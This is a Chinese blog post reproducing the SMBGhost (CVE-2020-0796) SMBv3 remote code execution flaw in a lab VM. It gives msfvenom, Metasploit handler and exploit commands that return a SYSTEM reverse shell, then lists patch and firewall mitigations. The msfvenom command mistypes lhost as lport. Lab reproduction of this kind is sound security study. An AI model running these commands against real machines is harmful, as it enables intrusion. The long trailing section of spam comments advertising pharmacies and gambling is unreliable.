CVE-2020-0796 SMBGhost RCE漏洞复现

临近期末考试,忙里偷闲复现下漏洞

0x00 关于CVE-2020-0796

一个由 Microsoft Server Message Block 3.1.1 (SMBv3)协议处理特殊请求时导致的远程代码执行(RCE)漏洞。攻击者如果成功利用漏洞,可以在目标服务器或客户端执行恶意代码 (攻击成功后,直接获取最高权限SYSTEM)。

影响版本:Win10 1903-1909。

微软于2020/03/13发布了漏洞补丁,补丁编号为KB4551762。

0x01 复现环境搭建

笔者在MSDN-itellyou上下载了Win10 1903 64位无补丁版本的镜像安装了虚拟机。注意,在安装前移除虚拟机的网卡,防止安装时或安装后系统自动升级或打补丁。

安装完成后,关闭Windows防火墙。

下载检测工具和利用工具,并确保配置好Python3环境:

检测脚本:https://github.com/ollypwn/SMBGhost
奇安信检查工具:http://dl.qianxin.com/skylar6/CVE-2020-0796-Scanner.zip
PoC:https://github.com/chompie1337/SMBGhost_RCE_PoC.git

0x02 漏洞检查

听说ollypwn的检测脚本不准确,所以脚本和奇安信的工具我就都用了。

脚本检测:

奇安信工具自己扫自己(不要问为什么):

确认存在漏洞

0x03 漏洞利用

Kali Linux:192.168.154.133
Win10 1903 x64:192.168.154.136

使用msfvenom生成shellcode(反弹):

msfvenom -p windows/x64/meterpreter/reverse_tcp lport=192.168.154.133 lport=4444 -f py -o exp.py

替换exp.py中的buf为USER_PAYLOAD:

复制Payload,替换漏洞利用脚本exploit.py中的Payload:

可以看到,脚本作者还为此发了牢骚哈哈 (你相信吗,我竟然为了一段shellcode下载了Kali Linux)。

打开msfconsole,配置好handler:

handler -p windows/x64/meterpreter/reverse_tcp -H 0.0.0.0 -P 4444

运行脚本:

python3 exploit.py -i 192.168.154.136

注意:可能不会一次成功,目标机器可能会蓝屏并重启,注意观察

我这里运气不错,靶机没有蓝屏就弹回shell了,SYSTEM权限:

0x04 漏洞修复

这些是我自己想到的方案,可能有不足:

  • 安装KB4551762补丁
  • 禁用SMB服务,或配置防火墙限制连入445端口
  • 安装杀软,CVE-2020-0796已经入库

Tags:

You may also like...

146 Responses

  1. click for more info说道:
    2022年6月1日 上午4:07

    Fantastic article post. Fantastic.

    回复
  2. big clit pump说道:
    2022年6月1日 下午9:51

    Looking forward to reading more. Great post.Thanks Again. Cool.

    回复
  3. ยูฟ่า说道:
    2022年6月3日 下午9:32

    Say, you got a nice blog post.Really thank you! Fantastic.

    回复
  4. st catharines condos for sale说道:
    2022年6月4日 下午3:11

    Say, you got a nice blog post.Really thank you! Cool.

    回复
  5. 4movierulz说道:
    2022年6月5日 下午5:25

    Fantastic blog post.Really thank you! Really Cool.

    回复
  6. car detailing kansas city, mo说道:
    2022年6月8日 下午4:30

    Muchos Gracias for your article post.

    回复
  7. car detailing lenexa, ks说道:
    2022年6月8日 下午7:51

    Very informative blog article.Really looking forward to read more. Really Great.

    回复
  8. go now说道:
    2022年6月9日 下午6:50

    Very informative blog article.Much thanks again. Fantastic.

    回复
  9. boombox codes说道:
    2022年6月10日 上午2:12

    Very neat blog post.Much thanks again. Awesome.

    回复
  10. Bounce House Rentals说道:
    2022年6月10日 上午4:39

    male ed pills causes for ed – best canadian pharmacy online

    回复
  11. online assignments websites说道:
    2022年6月12日 下午4:53

    Fantastic post.Really looking forward to read more. Will read on…

    回复
  12. intense driving说道:
    2022年6月12日 下午7:31

    Looking forward to reading more. Great blog.Much thanks again. Really Cool.

    回复
  13. birthday party decorations说道:
    2022年6月15日 下午6:38

    Awesome blog article.Thanks Again. Cool.

    回复
  14. ibosport.com bandar dan agen judi bola online terpercaya说道:
    2022年6月16日 下午7:56

    wow, awesome blog article.Really thank you! Fantastic.

    回复
  15. whs rpl说道:
    2022年6月18日 下午3:52

    I loved your post.Really looking forward to read more. Keep writing.

    回复
  16. dung cu gia cong tinh ha说道:
    2022年6月21日 上午4:36

    เล่นบาคาร่าออนไลน์ได้อย่างง่ายๆแค่เพียงเข้ามาที่ UFABET กดเข้าหน้าสมัครก็สารมารถทำเงินได้โดยทันที เราเป็นคาสิโนออนไลน์ที่เหมาะสมที่สุด ระบบใช้งานง่ายเป็นมีคณะทำงานคอยให้คำแนะนำและชี้แนะแม้เกิดปัญหา บริการดีเคยชิน จะเล่นพันออนไลน์ทั้งทีควรต้องUFABET

    回复
  17. Barbershop Manhattan说道:
    2022年6月24日 上午9:27

    Does it look like we’re in for a big ride here?

    回复
  18. thor love and thunder movie说道:
    2022年6月24日 下午7:53

    You write Formidable articles, keep up good work.

    回复
  19. linetogel说道:
    2022年6月25日 下午10:27

    pay for term paper – purchase essay online canadian pharmacy

    回复
  20. concrete pave说道:
    2022年6月29日 下午3:56

    A big thank you for your article post.Really thank you! Keep writing.

    回复
  21. judi bola com说道:
    2022年6月29日 下午7:09

    Appreciate you sharing, great article post.Thanks Again. Want more.

    回复
  22. piala dunia 2022说道:
    2022年7月2日 上午10:21

    I really like and appreciate your article post.Really looking forward to read more. Will read on…

    回复
  23. Tattoo Shops说道:
    2022年7月5日 下午6:17

    ivermectin tablets dosage ivermectin for humans for sale

    回复
  24. wimbledon 2022 live说道:
    2022年7月5日 下午10:23

    Does it look like we’re in for a big ride here?

    回复
  25. Engagement Rings说道:
    2022年7月7日 上午12:14

    Thank you ever so for you blog article. Cool.

    回复
  26. parimatch casino说道:
    2022年7月7日 下午2:55

    Really informative blog article.Thanks Again. Want more.

    回复
  27. Marsuki说道:
    2022年7月7日 下午5:44

    Nice i really enjoyed reading your blogs. Keep on posting. Thanks

    回复
  28. vacuum erection device说道:
    2022年7月7日 下午7:25

    Thank you for your article.Really thank you! Really Great.

    回复
  29. thor love and thunder full movie online free说道:
    2022年7月8日 上午3:54

    Nice i really enjoyed reading your blogs. Keep on posting. Thanks

    回复
  30. kurla day说道:
    2022年7月10日 下午10:30

    Awesome article post.Really thank you! Awesome.

    回复
  31. ??????说道:
    2022年7月12日 下午1:31

    Ytdclp – how long does it take for sildenafil to work Xcpcaz zkhsgu

    回复
  32. Marsuki说道:
    2022年7月12日 下午7:43

    Nice i really enjoyed reading your blogs. Keep on posting. Thanks

    回复
  33. to learn more说道:
    2022年7月12日 下午9:24

    online pharmacy without s – oralciapll tadalafil uk

    回复
  34. Malaysian Fake Driving Licence说道:
    2022年7月14日 上午11:22

    A great post without any doubt.

    回复
  35. gym equipment for sale说道:
    2022年7月15日 上午1:50

    Thank you for sharing indeed great looking !

    回复
  36. golf carts for sale说道:
    2022年7月16日 上午12:46

    Nice i really enjoyed reading your blogs. Keep on posting. Thanks

    回复
  37. corgi puppies for sale说道:
    2022年7月16日 下午7:00

    Nice i really enjoyed reading your blogs. Keep on posting. Thanks

    回复
  38. Thor: Love and Thunder 2022 Full Movie说道:
    2022年7月19日 上午1:30

    A great post without any doubt.

    回复
  39. iphone 13 pro max bumper case说道:
    2022年7月20日 上午12:55

    I encountered your site after doing a search for new contesting using Google, and decided to stick around and read more of your articles. Thanks for posting, I have your site bookmarked now.

    回复
  40. roofing说道:
    2022年7月21日 下午2:53

    Thank you for your article post.Really thank you! Really Cool.

    回复
  41. meenakari jewellery说道:
    2022年7月30日 下午11:28

    wow, awesome blog post.Really thank you!

    回复
  42. https://livenewsof.com/a-review-of-5-components-of-physical-fitness/说道:
    2022年7月31日 上午3:06

    Nice i really enjoyed reading your blogs. Keep on posting. Thanks

    回复
  43. https://livenewsof.com/bloomberg-tv/说道:
    2022年7月31日 下午1:48

    Thank you for sharing indeed great looking !

    回复
  44. krt carts for sale说道:
    2022年8月1日 上午12:40

    Nice i really enjoyed reading your blogs. Keep on posting. Thanks

    回复
  45. Satta Matka Kurla Day说道:
    2022年8月1日 上午2:58

    Wow, great post.Much thanks again. Cool.

    回复
  46. Tubidy说道:
    2022年8月1日 下午8:04

    Thank you for your article.Really looking forward to read more. Want more.

    回复
  47. fake money for sale说道:
    2022年8月2日 下午2:46

    Thank you for sharing indeed great looking !

    回复
  48. europa legjobb说道:
    2022年8月3日 下午11:09

    Thank you for your blog. Really Great.

    回复
  49. technology说道:
    2022年8月5日 下午7:54

    How do I subscribe to your blog? Thanks for your help.

    回复
  50. Ruby Ali说道:
    2022年8月6日 上午12:14

    Muchos Gracias for your blog article.Really thank you! Much obliged.

    回复
  51. cake carts说道:
    2022年8月6日 上午1:39

    Thank you for sharing indeed great looking !

    回复
  52. cake carts说道:
    2022年8月6日 下午4:22

    Nice i really enjoyed reading your blogs. Keep on posting. Thanks

    回复
  53. cheap smm market说道:
    2022年8月7日 上午11:29

    I’ll right away take hold of your rss feed as I can not in finding your e-mail subscription link or newsletter service. Do you’ve any? Kindly allow me recognize in order that I may just subscribe. Thanks.

    回复
  54. https://dncforkliftsforsale.com/product/sunny-tank-selected-femme-2/说道:
    2022年8月14日 上午12:42

    A great post without any doubt.

    回复
  55. go kart for sale说道:
    2022年8月14日 下午4:43

    A great post without any doubt.

    回复
  56. Online assignment websites说道:
    2022年8月15日 下午4:41

    Very neat article post. Cool.

    回复
  57. Livestock For Sale说道:
    2022年8月18日 上午7:18

    Nice i really enjoyed reading your blogs. Keep on posting. Thanks

    回复
  58. space touch说道:
    2022年8月18日 下午3:40

    slots online free online slots play slots online

    回复
  59. pragmatic play indonesia说道:
    2022年8月21日 上午2:57

    I loved your blog post.Much thanks again. Fantastic.

    回复
  60. Steven Powers说道:
    2022年8月23日 上午12:55

    Do you have any video of that? I’d like to find out more details.

    回复
  61. سمعها说道:
    2022年8月23日 上午9:12

    I was able to find good information from your blog articles.

    回复
  62. trading company说道:
    2022年8月24日 下午6:40

    Cómo jugar ps5 jugar con un conocido aplicar juego partake

    回复
  63. kb contract vinyl说道:
    2022年8月25日 上午9:15

    Magnificent beat ! Can I be your apprentice? Just kidding!

    回复
  64. hop over to here说道:
    2022年8月28日 上午5:22

    I used to be able to find good advice from your blog articles.

    回复
  65. screen grab mac说道:
    2022年8月29日 下午10:59

    Nice blog. Could someone with little experience do it, and add updates without messing it up? Good information on here, very informative.

    回复
  66. informate说道:
    2022年9月2日 上午11:49

    Have you given any kind of thought at all with converting your current web-site into French? I know a couple of of translaters here that will would certainly help you do it for no cost if you want to get in touch with me personally.

    回复
  67. slotpg说道:
    2022年9月4日 上午7:41

    Appreciate you sharing, great blog.Thanks Again. Awesome.

    回复
  68. web protection说道:
    2022年9月8日 上午11:30

    Great, google took me stright here. thanks btw for info. Cheers!

    回复
  69. Bounce house rentals Columbiana, OH说道:
    2022年9月10日 上午1:42

    932361 398935I liked than you may be now. 760731

    回复
  70. found here说道:
    2022年9月11日 上午3:09

    Appreciate you sharing, great article post.Much thanks again. Cool.

    回复
  71. intense crash course driving说道:
    2022年9月11日 上午9:32

    Really informative post.Thanks Again. Want more.

    回复
  72. kelvin kaemingk loandepot说道:
    2022年9月11日 下午8:44

    Very informative blog post.Much thanks again. Much obliged.

    回复
  73. φωτογραφία γάμου说道:
    2022年9月12日 下午11:18

    Nice Post. It’s really a very good article. I noticed all your important points. Thanks.

    回复
  74. jasa backlink berkualitas说道:
    2022年9月15日 下午5:48

    jasa backlink pbn

    回复
  75. İzmir Eskort说道:
    2022年9月16日 下午8:43

    Have you given any kind of thought at all with converting your current web-site into French? I know a couple of of translaters here that will would certainly help you do it for no cost if you want to get in touch with me personally.

    回复
  76. cerrajero online说道:
    2022年9月28日 下午11:46

    Have you given any kind of thought at all with converting your current web-site into French? I know a couple of of translaters here that will would certainly help you do it for no cost if you want to get in touch with me personally.

    回复
  77. Tubidy说道:
    2022年9月30日 上午2:29

    Awesome post.Really thank you! Want more.

    回复
  78. mang hdpe说道:
    2022年10月5日 下午9:47

    trusted india online pharmacies: generic pills india online indian pharmacies

    回复
  79. สล็อต-ฝาก-ถอน-true-wallet-ไม่มี-บัญช说道:
    2022年10月6日 下午4:00

    Really informative post.Really thank you! Will read on…

    回复
  80. gacorslot说道:
    2022年10月9日 上午9:02

    I like your style!

    回复
  81. Kelvin Kaemingk St. Paul MN说道:
    2022年10月10日 上午12:50

    wow, awesome post.Really thank you! Much obliged.

    回复
  82. man and van说道:
    2022年10月10日 下午11:35

    hydroxychloroquine covid 19 hydroxychloroquine tablets

    回复
  83. 온라인카지노说道:
    2022年10月11日 上午11:46

    A big thank you for your post.Really looking forward to read more. Cool.

    回复
  84. 바카라사이트说道:
    2022年10月12日 上午12:47

    Really informative article post.Really looking forward to read more.

    回复
  85. 카지노파트너说道:
    2022年10月13日 上午12:00

    wow, awesome blog post.Thanks Again. Much obliged.

    回复
  86. 카지노총판说道:
    2022年10月13日 下午8:49

    Fantastic post. Awesome.

    回复
  87. mendapatkan lebih banyak说道:
    2022年10月16日 上午11:27

    I was able to find good advice from your blog posts.

    回复
  88. here说道:
    2022年10月24日 上午2:43

    how to make hydroxychloroquine at home plaquenil and alcohol

    回复
  89. bryce young football jersey说道:
    2022年10月25日 下午2:22

    hydroxychloroquine generic hydroxychloroquin

    回复
  90. page说道:
    2022年10月27日 下午11:43

    ivermectin 5: generic stromectol – ivermectin coronavirus

    回复
  91. click说道:
    2022年10月28日 下午6:27

    Medicine prescribing information. Long-Term Effects. In USAtrazodone pillSome information about medication. Get now.

    回复
  92. kich thuoc phong golf 3d说道:
    2022年10月30日 下午5:11

    สล็อตออนไลน์เกมคาสิโนยอดนิยมชั่วกัลปวสาน เล่นง่าย แจ็คพอตแตกไวจำเป็นต้องที่ UFABET จ่ายจริง จ่ายเต็ม มีเกมให้เลือกมากมายทั้งพนันบอล บาคาร่า ยิงปลา มาเว็บไซต์นี้เว็บเดียวบอกเลยจ้าขอรับว่าโคตรคุ้ม สร้างรายได้กล้วยๆจบที่เว็บไซต์ UFABET ได้เลยคะครับผม

    回复
  93. Read More Here说道:
    2022年10月30日 下午11:30

    Thanks for finally talking about >Custom Design Playground Completed for Gabriella Park

    回复
  94. shop-elultimotourdelmundo.com说道:
    2022年10月31日 下午12:03

    Cheers! Terrific information. Can You Get Propecia On Nhs

    回复
  95. 카지노총판说道:
    2022年10月31日 下午8:44

    Very informative article post.Thanks Again. Really Great.

    回复
  96. Moved here说道:
    2022年11月5日 下午10:29

    ed treatment options erectile dysfunction medications – male dysfunction

    回复
  97. puertas metalicas说道:
    2022年11月8日 上午7:39

    I really like your writing style, excellent info , thanks for putting up : D.

    回复
  98. dao tao giao vien yoga 200h,300h,500h说道:
    2022年11月9日 上午5:48

    Thank you for your article post.Much thanks again. Fantastic.Loading…

    回复
  99. why not find out more说道:
    2022年11月12日 上午9:10

    Muchos Gracias for your article post.Much thanks again. Much obliged.

    回复
  100. pavers livermore说道:
    2022年11月13日 下午12:02

    wow, awesome blog article.Thanks Again. Keep writing.

    回复
  101. Boats for sale说道:
    2022年11月13日 下午12:07

    Nice i really enjoyed reading your blogs. Keep on posting. Thanks

    回复
  102. for sale说道:
    2022年11月13日 下午1:01

    Thank you for sharing indeed great looking !

    回复
  103. Boats for sale说道:
    2022年11月13日 下午1:07

    A great post without any doubt.

    回复
  104. for sale说道:
    2022年11月13日 下午4:11

    Thank you for sharing indeed great looking !

    回复
  105. for sale说道:
    2022年11月14日 上午12:55

    Thank you for sharing indeed great looking !

    回复
  106. pavers livermore说道:
    2022年11月14日 上午5:25

    Very informative post.Really thank you! Want more.

    回复
  107. scrap car removal vancouver说道:
    2022年11月17日 上午11:42

    Regards for helping out, superb info.

    回复
  108. apple crumble说道:
    2022年11月19日 上午4:53

    A big thank you for your blog article.Really looking forward to read more. Much obliged.

    回复
  109. live free说道:
    2022年11月20日 下午10:46

    It’s time for communities to rally.

    回复
  110. buy viagra说道:
    2022年11月23日 上午10:37

    bonjour I love Your Blog can not say I come here often but im liking what i c so far….

    回复
  111. Tubidy说道:
    2022年11月27日 上午1:46

    I really like and appreciate your blog article.Really thank you! Great.

    回复
  112. Kelvin Kaemingk说道:
    2022年12月1日 上午7:19

    Very good blog post.Really looking forward to read more. Will read on…

    回复
  113. best currency trade说道:
    2022年12月1日 上午7:53

    professional resume serviceswriting and editing services

    回复
  114. invest foreign currency说道:
    2022年12月1日 下午1:59

    soolantra for sale canadaliterary needle biopsy evaluation

    回复
  115. buy stocks now说道:
    2022年12月3日 下午6:13

    canadian pharmacy review – mexican pharmacy online rx pharmacy

    回复
  116. thu?c n? ng?c an toàn说道:
    2022年12月5日 上午3:38

    ivermectin tablets ivermectin 4000 mcg – ivermectin pills human

    回复
  117. to learn more说道:
    2022年12月5日 上午9:47

    cymbalta withdrawal side effects duloxetine side effects duloxetine generic

    回复
  118. more details说道:
    2022年12月5日 下午10:00

    Can someone recommend Vac U Lock Strap Ons? Cheers xxx

    回复
  119. C_ARSCC_2208 questions说道:
    2022年12月8日 上午2:28

    atera apartments how to take apart a keurig

    回复
  120. Raspored nastave I i II ciklus说道:
    2022年12月10日 下午2:39

    Really informative blog article.Thanks Again. Really Great.Loading…

    回复
  121. ygdy movie说道:
    2022年12月17日 下午11:50

    Very neat blog.Really looking forward to read more. Really Cool.

    回复
  122. arahkan ke orang-orang ini说道:
    2022年12月18日 上午10:17

    Good information. Lucky me I found your site by accident (stumbleupon). I’ve book marked it for later!

    回复
  123. Printable Free Pulse Oximeter template说道:
    2022年12月19日 下午6:26

    Very informative blog article.Thanks Again. Really Cool.

    回复
  124. bar chapel street说道:
    2022年12月20日 上午2:06

    Very informative post. Cool.

    回复
  125. earrings design说道:
    2022年12月20日 下午10:08

    I really like and appreciate your blog.Much thanks again. Really Great.

    回复
  126. inmobiliarias actur zaragoza说道:
    2022年12月20日 下午10:58

    Nice blog. Could someone with little experience do it, and add updates without messing it up? Good information on here, very informative.

    回复
  127. best laptops under 30000说道:
    2022年12月21日 下午7:07

    Say, you got a nice article post. Fantastic.

    回复
  128. hatter说道:
    2022年12月21日 下午9:39

    I really like and appreciate your article post.Thanks Again. Cool.

    回复
  129. led tube light india说道:
    2022年12月23日 上午12:11

    Appreciate you sharing, great article.Really looking forward to read more. Great.

    回复
  130. Indian recipes说道:
    2022年12月23日 上午4:06

    Fantastic post.Really looking forward to read more. Keep writing.

    回复
  131. chuong trinh dinh cu canada说道:
    2022年12月26日 下午1:08

    Howdy, a helpful article for sure. Thank you.

    回复
  132. agen poker Jayabola2 terpercaya说道:
    2022年12月27日 下午10:06

    Say, you got a nice blog post.Thanks Again. Great.

    回复
  133. Uae law firm说道:
    2022年12月28日 下午9:07

    What a great article.. i subscribed btw!

    回复
  134. Tree maintenance for property value说道:
    2022年12月30日 上午5:18

    wow, awesome blog article.Really looking forward to read more.

    回复
  135. Jili 777 slot说道:
    2023年1月4日 上午8:17

    I loved your article post. Awesome.

    回复
  136. how to upload a song to spotify说道:
    2023年1月6日 上午12:03

    Paribu güvenilir mi öğrenmek için hemen tıklayın ve paribu güvenilir mi öğrenin!

    回复
  137. 1769-ob32说道:
    2023年1月6日 上午1:49

    Great article. Awesome.

    回复
  138. mp3juice.org.za说道:
    2023年1月6日 下午2:59

    I couldn’t refrain from commenting. Well written.

    回复
  139. 에볼루션카지노说道:
    2023年1月7日 下午6:37

    I really liked your article. Great.

    回复
  140. 에볼루션사이트说道:
    2023年1月8日 上午9:55

    Fantastic post.Much thanks again. Cool.

    回复
  141. situs online judi terbaik pkv说道:
    2023年1月8日 下午8:51

    Enjoyed every bit of your blog.Really thank you! Want more.

    回复
  142. hoc sua chua may tinh hcm说道:
    2023年1月17日 上午8:02

    ??? ?????? ?????? ??????: ??????????? ??????? ???? ????? ?? ????? ??????? ???????? ?????? ????????? ? ??????? ????????????? ?????? ?????? ??????? 2021 ????

    回复
  143. Search engine optimization说道:
    2023年2月4日 下午3:34

    Thanks for sharing your info. I really appreciate
    your efforts and I will be waiting for your next
    post thank you once again.

    回复
  144. https://besteraktienkaufen.de/说道:
    2023年2月5日 上午7:48

    best canadian online pharmacy canada pharmacies/account erectile dysfunction pills

    回复
  1. 1gravitation
    2022年6月20日

    3requires

  2. 2onerous
    2023年1月26日

    2assignment

发表回复

您的电子邮箱地址不会被公开。 必填项已用*标注